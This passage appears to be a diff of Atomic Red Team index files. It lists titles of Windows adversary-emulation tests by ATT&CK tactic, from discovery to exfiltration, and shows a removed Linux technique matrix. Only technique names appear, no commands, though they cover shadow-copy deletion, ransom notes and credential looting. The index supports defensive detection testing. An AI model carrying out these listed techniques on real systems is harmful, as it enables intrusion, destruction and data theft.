- Atomic Test #2: Security Software Discovery - powershell [windows]
- Atomic Test #5: Security Software Discovery - Sysmon Service [windows]
- Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #1: Remote System Discovery - net [windows]
- Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]
- Atomic Test #3: Remote System Discovery - nltest [windows]
- Atomic Test #4: Remote System Discovery - ping sweep [windows]
- Atomic Test #5: Remote System Discovery - arp [windows]
- Atomic Test #8: Remote System Discovery - nslookup [windows]
- Atomic Test #9: Remote System Discovery - adidnsdump [windows]
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
- Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
- Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
- Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
- Atomic Test #18: Get-DomainController with PowerView [windows]
- Atomic Test #19: Get-WmiObject to Enumerate Domain Controllers [windows]
- Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
- Atomic Test #5: WinPwn - spoolvulnscan [windows]
- Atomic Test #6: WinPwn - MS17-10 [windows]
- Atomic Test #7: WinPwn - bluekeep [windows]
- Atomic Test #8: WinPwn - fruit [windows]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- Atomic Test #4: WinPwn - Dotnetsearch [windows]
- Atomic Test #5: WinPwn - DotNet [windows]
- Atomic Test #6: WinPwn - powerSQL [windows]
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
- Atomic Test #5: System Time with Windows time Command [windows]
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1489 Service Stop](../../T1489/T1489.md)
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- Atomic Test #3: Remove Account From Domain Admin Group [windows]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #5: PureLocker Ransom Note [windows]
- Atomic Test #8: Data Encrypted with GPG4Win [windows]
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #3: Overwrite deleted data on C drive [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - wbadmin Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- Atomic Test #8: Windows - Disable the SR scheduled task [windows]
- Atomic Test #9: Disable System Restore Through Registry [windows]
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
- Atomic Test #10: Logoff System - Windows [windows]
# initial-access
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1566.001 Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md)
- Atomic Test #1: Download Macro-Enabled Phishing Attachment [windows]
- Atomic Test #2: Word spawned a command shell and used an IP address in the command line [windows]
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- [T1195 Supply Chain Compromise](../../T1195/T1195.md)
- Atomic Test #1: Octopus Scanner Malware Open Source Supply Chain [windows]
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
# exfiltration
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1020 Automated Exfiltration](../../T1020/T1020.md)
- Atomic Test #1: IcedID Botnet HTTP PUT [windows]
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows]
- [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md)
- Atomic Test #1: C2 Data Exfiltration [windows]
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #3: DNSExfiltration (doh) [windows]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
- Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
- Atomic Test #6: MAZE FTP Upload [windows]
- Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
atomics/Indexes/Matrices/linux-matrix.md
-94
View File
@@ -1,94 +0,0 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A 